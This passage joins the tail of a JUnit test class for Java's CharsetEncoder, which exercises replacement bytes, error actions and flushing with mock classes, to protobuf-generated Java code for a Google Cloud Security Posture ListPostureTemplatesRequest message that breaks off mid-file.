out = ByteBuffer.allocate(6); CharBuffer in = CharBuffer.wrap("aaa"); assertEquals(in.remaining(), 3); // by encode facade, so that internal state will be wrong encoder.encode(CharBuffer.wrap("testFlush"), ByteBuffer.allocate(20), true); assertSame(CoderResult.UNDERFLOW, encoder .flush(ByteBuffer.allocate(50))); } /* * test isLegalReplacement(byte[]) */ public void testIsLegalReplacement() { try { encoder.isLegalReplacement(null); fail("should throw null pointer exception"); } catch (NullPointerException e) { } assertTrue(encoder.isLegalReplacement(specifiedReplacement)); assertTrue(encoder.isLegalReplacement(new byte[200])); byte[] ba = getIllegalByteArray(); if (ba != null) { assertFalse(encoder.isLegalReplacement(ba)); } } public void testIsLegalReplacementEmptyArray() { // ISO, ASC, GB, UTF8 encoder will throw exception in RI // others will pass // try { assertTrue(encoder.isLegalReplacement(new byte[0])); // fail("should throw ArrayIndexOutOfBoundsException"); // } catch (ArrayIndexOutOfBoundsException e) { // } } public void testOnMalformedInput() { assertSame(CodingErrorAction.REPORT, encoder.malformedInputAction()); try { encoder.onMalformedInput(null); fail("should throw null pointer exception"); } catch (IllegalArgumentException e) { } encoder.onMalformedInput(CodingErrorAction.IGNORE); assertSame(CodingErrorAction.IGNORE, encoder.malformedInputAction()); } public void testOnUnmappableCharacter() { assertSame(CodingErrorAction.REPORT, encoder .unmappableCharacterAction()); try { encoder.onUnmappableCharacter(null); fail("should throw null pointer exception"); } catch (IllegalArgumentException e) { } encoder.onUnmappableCharacter(CodingErrorAction.IGNORE); assertSame(CodingErrorAction.IGNORE, encoder .unmappableCharacterAction()); } public void testReplacement() { try { encoder.replaceWith(null); fail("should throw null pointer exception"); } catch (IllegalArgumentException e) { } try { encoder.replaceWith(new byte[0]); fail("should throw null pointer 
exception"); } catch (IllegalArgumentException e) { } try { encoder.replaceWith(new byte[100]); fail("should throw null pointer exception"); } catch (IllegalArgumentException e) { } byte[] nr = getLegalByteArray(); assertSame(encoder, encoder.replaceWith(nr)); assertSame(nr, encoder.replacement()); nr = getIllegalByteArray(); try { encoder.replaceWith(new byte[100]); fail("should throw null pointer exception"); } catch (IllegalArgumentException e) { } } protected byte[] getLegalByteArray() { return new byte[] { 'a' }; } protected byte[] getIllegalByteArray() { return new byte[155]; } /* * Mock subclass of CharsetEncoder For protected method test */ public static class MockCharsetEncoder extends CharsetEncoder { boolean flushed = false; public boolean isFlushed() { boolean result = flushed; flushed = false; return result; } public boolean isLegalReplacement(byte[] ba) { if (ba.length == 155) {// specified magic number, return false return false; } return super.isLegalReplacement(ba); } public MockCharsetEncoder(Charset cs, float aver, float max) { super(cs, aver, max); } public MockCharsetEncoder(Charset cs, float aver, float max, byte[] replacement) { super(cs, aver, max, replacement); } protected CoderResult encodeLoop(CharBuffer in, ByteBuffer out) { int inPosition = in.position(); char[] input = new char[in.remaining()]; in.get(input); String result = new String(input); if (result.startsWith("malform")) { // reset the cursor to the error position in.position(inPosition); // in.position(0); // set the error length return CoderResult.malformedForLength("malform".length()); } else if (result.startsWith("unmap")) { // reset the cursor to the error position in.position(inPosition); // in.position(0); // set the error length return CoderResult.unmappableForLength("unmap".length()); } else if (result.startsWith("runtime")) { // reset the cursor to the error position in.position(0); // set the error length throw new RuntimeException("runtime"); } int inLeft = 
input.length; int outLeft = out.remaining(); CoderResult r = CoderResult.UNDERFLOW; int length = inLeft; if (outLeft < inLeft) { r = CoderResult.OVERFLOW; length = outLeft; in.position(inPosition + outLeft); } for (int i = 0; i < length; i++) { out.put((byte) input[i]); } return r; } protected CoderResult implFlush(ByteBuffer out) { CoderResult result = super.implFlush(out); int length = 0; if (out.remaining() >= 5) { length = 5; result = CoderResult.UNDERFLOW; flushed = true; // for (int i = 0; i < length; i++) { // out.put((byte)'f'); // } } else { length = out.remaining(); result = CoderResult.OVERFLOW; } return result; } protected void implReplaceWith(byte[] ba) { assertSame(ba, replacement()); } } /* * mock charset for test encoder initialization */ public static class MockCharset extends Charset { protected MockCharset(String arg0, String[] arg1) { super(arg0, arg1); } public boolean contains(Charset arg0) { return false; } public CharsetDecoder newDecoder() { return new CharsetDecoderTest.MockCharsetDecoder(this, (float) AVER_BYTES, MAX_BYTES); } public CharsetEncoder newEncoder() { return new MockCharsetEncoder(this, (float) AVER_BYTES, MAX_BYTES); } } }
googleapis/google-cloud-java
35,719
java-securityposture/proto-google-cloud-securityposture-v1/src/main/java/com/google/cloud/securityposture/v1/ListPostureTemplatesRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/securityposture/v1/securityposture.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.securityposture.v1; /** * * * <pre> * Message for requesting list of Posture Templates. * </pre> * * Protobuf type {@code google.cloud.securityposture.v1.ListPostureTemplatesRequest} */ public final class ListPostureTemplatesRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.securityposture.v1.ListPostureTemplatesRequest) ListPostureTemplatesRequestOrBuilder { private static final long serialVersionUID = 0L; // Use ListPostureTemplatesRequest.newBuilder() to construct. 
private ListPostureTemplatesRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListPostureTemplatesRequest() { parent_ = ""; pageToken_ = ""; filter_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListPostureTemplatesRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.securityposture.v1.V1mainProto .internal_static_google_cloud_securityposture_v1_ListPostureTemplatesRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.securityposture.v1.V1mainProto .internal_static_google_cloud_securityposture_v1_ListPostureTemplatesRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.class, com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.Builder.class); } public static final int PARENT_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object parent_ = ""; /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The parent. */ @java.lang.Override public java.lang.String getParent() { java.lang.Object ref = parent_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); parent_ = s; return s; } } /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for parent. 
*/ @java.lang.Override public com.google.protobuf.ByteString getParentBytes() { java.lang.Object ref = parent_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); parent_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int PAGE_SIZE_FIELD_NUMBER = 2; private int pageSize_ = 0; /** * * * <pre> * Optional. Requested page size. Server may return fewer items than * requested. If unspecified, server will pick an appropriate default. * </pre> * * <code>int32 page_size = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The pageSize. */ @java.lang.Override public int getPageSize() { return pageSize_; } public static final int PAGE_TOKEN_FIELD_NUMBER = 3; @SuppressWarnings("serial") private volatile java.lang.Object pageToken_ = ""; /** * * * <pre> * Optional. A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The pageToken. */ @java.lang.Override public java.lang.String getPageToken() { java.lang.Object ref = pageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); pageToken_ = s; return s; } } /** * * * <pre> * Optional. A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for pageToken. 
*/ @java.lang.Override public com.google.protobuf.ByteString getPageTokenBytes() { java.lang.Object ref = pageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); pageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int FILTER_FIELD_NUMBER = 4; @SuppressWarnings("serial") private volatile java.lang.Object filter_ = ""; /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The filter. */ @java.lang.Override public java.lang.String getFilter() { java.lang.Object ref = filter_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); filter_ = s; return s; } } /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for filter. 
*/ @java.lang.Override public com.google.protobuf.ByteString getFilterBytes() { java.lang.Object ref = filter_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); filter_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(parent_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, parent_); } if (pageSize_ != 0) { output.writeInt32(2, pageSize_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(pageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 3, pageToken_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(filter_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 4, filter_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(parent_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, parent_); } if (pageSize_ != 0) { size += com.google.protobuf.CodedOutputStream.computeInt32Size(2, pageSize_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(pageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, pageToken_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(filter_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(4, filter_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return 
size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.securityposture.v1.ListPostureTemplatesRequest)) { return super.equals(obj); } com.google.cloud.securityposture.v1.ListPostureTemplatesRequest other = (com.google.cloud.securityposture.v1.ListPostureTemplatesRequest) obj; if (!getParent().equals(other.getParent())) return false; if (getPageSize() != other.getPageSize()) return false; if (!getPageToken().equals(other.getPageToken())) return false; if (!getFilter().equals(other.getFilter())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + PARENT_FIELD_NUMBER; hash = (53 * hash) + getParent().hashCode(); hash = (37 * hash) + PAGE_SIZE_FIELD_NUMBER; hash = (53 * hash) + getPageSize(); hash = (37 * hash) + PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getPageToken().hashCode(); hash = (37 * hash) + FILTER_FIELD_NUMBER; hash = (53 * hash) + getFilter().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return 
PARSER.parseFrom(data); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest 
parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.securityposture.v1.ListPostureTemplatesRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Message for requesting list of Posture Templates. 
* </pre> * * Protobuf type {@code google.cloud.securityposture.v1.ListPostureTemplatesRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.securityposture.v1.ListPostureTemplatesRequest) com.google.cloud.securityposture.v1.ListPostureTemplatesRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.securityposture.v1.V1mainProto .internal_static_google_cloud_securityposture_v1_ListPostureTemplatesRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.securityposture.v1.V1mainProto .internal_static_google_cloud_securityposture_v1_ListPostureTemplatesRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.class, com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.Builder.class); } // Construct using com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; parent_ = ""; pageSize_ = 0; pageToken_ = ""; filter_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.securityposture.v1.V1mainProto .internal_static_google_cloud_securityposture_v1_ListPostureTemplatesRequest_descriptor; } @java.lang.Override public com.google.cloud.securityposture.v1.ListPostureTemplatesRequest getDefaultInstanceForType() { return com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.getDefaultInstance(); } @java.lang.Override public com.google.cloud.securityposture.v1.ListPostureTemplatesRequest build() { 
com.google.cloud.securityposture.v1.ListPostureTemplatesRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.securityposture.v1.ListPostureTemplatesRequest buildPartial() { com.google.cloud.securityposture.v1.ListPostureTemplatesRequest result = new com.google.cloud.securityposture.v1.ListPostureTemplatesRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.securityposture.v1.ListPostureTemplatesRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.parent_ = parent_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.pageSize_ = pageSize_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.pageToken_ = pageToken_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.filter_ = filter_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof 
com.google.cloud.securityposture.v1.ListPostureTemplatesRequest) { return mergeFrom((com.google.cloud.securityposture.v1.ListPostureTemplatesRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.securityposture.v1.ListPostureTemplatesRequest other) { if (other == com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.getDefaultInstance()) return this; if (!other.getParent().isEmpty()) { parent_ = other.parent_; bitField0_ |= 0x00000001; onChanged(); } if (other.getPageSize() != 0) { setPageSize(other.getPageSize()); } if (!other.getPageToken().isEmpty()) { pageToken_ = other.pageToken_; bitField0_ |= 0x00000004; onChanged(); } if (!other.getFilter().isEmpty()) { filter_ = other.filter_; bitField0_ |= 0x00000008; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { parent_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 16: { pageSize_ = input.readInt32(); bitField0_ |= 0x00000002; break; } // case 16 case 26: { pageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000004; break; } // case 26 case 34: { filter_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000008; break; } // case 34 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { 
onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object parent_ = ""; /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The parent. */ public java.lang.String getParent() { java.lang.Object ref = parent_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); parent_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for parent. */ public com.google.protobuf.ByteString getParentBytes() { java.lang.Object ref = parent_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); parent_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The parent to set. * @return This builder for chaining. */ public Builder setParent(java.lang.String value) { if (value == null) { throw new NullPointerException(); } parent_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return This builder for chaining. 
*/ public Builder clearParent() { parent_ = getDefaultInstance().getParent(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The bytes for parent to set. * @return This builder for chaining. */ public Builder setParentBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); parent_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private int pageSize_; /** * * * <pre> * Optional. Requested page size. Server may return fewer items than * requested. If unspecified, server will pick an appropriate default. * </pre> * * <code>int32 page_size = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The pageSize. */ @java.lang.Override public int getPageSize() { return pageSize_; } /** * * * <pre> * Optional. Requested page size. Server may return fewer items than * requested. If unspecified, server will pick an appropriate default. * </pre> * * <code>int32 page_size = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The pageSize to set. * @return This builder for chaining. */ public Builder setPageSize(int value) { pageSize_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Optional. Requested page size. Server may return fewer items than * requested. If unspecified, server will pick an appropriate default. * </pre> * * <code>int32 page_size = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearPageSize() { bitField0_ = (bitField0_ & ~0x00000002); pageSize_ = 0; onChanged(); return this; } private java.lang.Object pageToken_ = ""; /** * * * <pre> * Optional. 
A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The pageToken. */ public java.lang.String getPageToken() { java.lang.Object ref = pageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); pageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Optional. A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for pageToken. */ public com.google.protobuf.ByteString getPageTokenBytes() { java.lang.Object ref = pageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); pageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Optional. A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The pageToken to set. * @return This builder for chaining. */ public Builder setPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } pageToken_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Optional. A token identifying a page of results the server should return. * </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearPageToken() { pageToken_ = getDefaultInstance().getPageToken(); bitField0_ = (bitField0_ & ~0x00000004); onChanged(); return this; } /** * * * <pre> * Optional. A token identifying a page of results the server should return. 
* </pre> * * <code>string page_token = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The bytes for pageToken to set. * @return This builder for chaining. */ public Builder setPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); pageToken_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } private java.lang.Object filter_ = ""; /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The filter. */ public java.lang.String getFilter() { java.lang.Object ref = filter_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); filter_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for filter. */ public com.google.protobuf.ByteString getFilterBytes() { java.lang.Object ref = filter_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); filter_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The filter to set. * @return This builder for chaining. 
*/ public Builder setFilter(java.lang.String value) { if (value == null) { throw new NullPointerException(); } filter_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearFilter() { filter_ = getDefaultInstance().getFilter(); bitField0_ = (bitField0_ & ~0x00000008); onChanged(); return this; } /** * * * <pre> * Optional. Filter to be applied on the resource, defined by EBNF grammar * https://google.aip.dev/assets/misc/ebnf-filtering.txt. * </pre> * * <code>string filter = 4 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The bytes for filter to set. * @return This builder for chaining. */ public Builder setFilterBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); filter_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.securityposture.v1.ListPostureTemplatesRequest) } // @@protoc_insertion_point(class_scope:google.cloud.securityposture.v1.ListPostureTemplatesRequest) private static final com.google.cloud.securityposture.v1.ListPostureTemplatesRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.securityposture.v1.ListPostureTemplatesRequest(); } public static com.google.cloud.securityposture.v1.ListPostureTemplatesRequest getDefaultInstance() { 
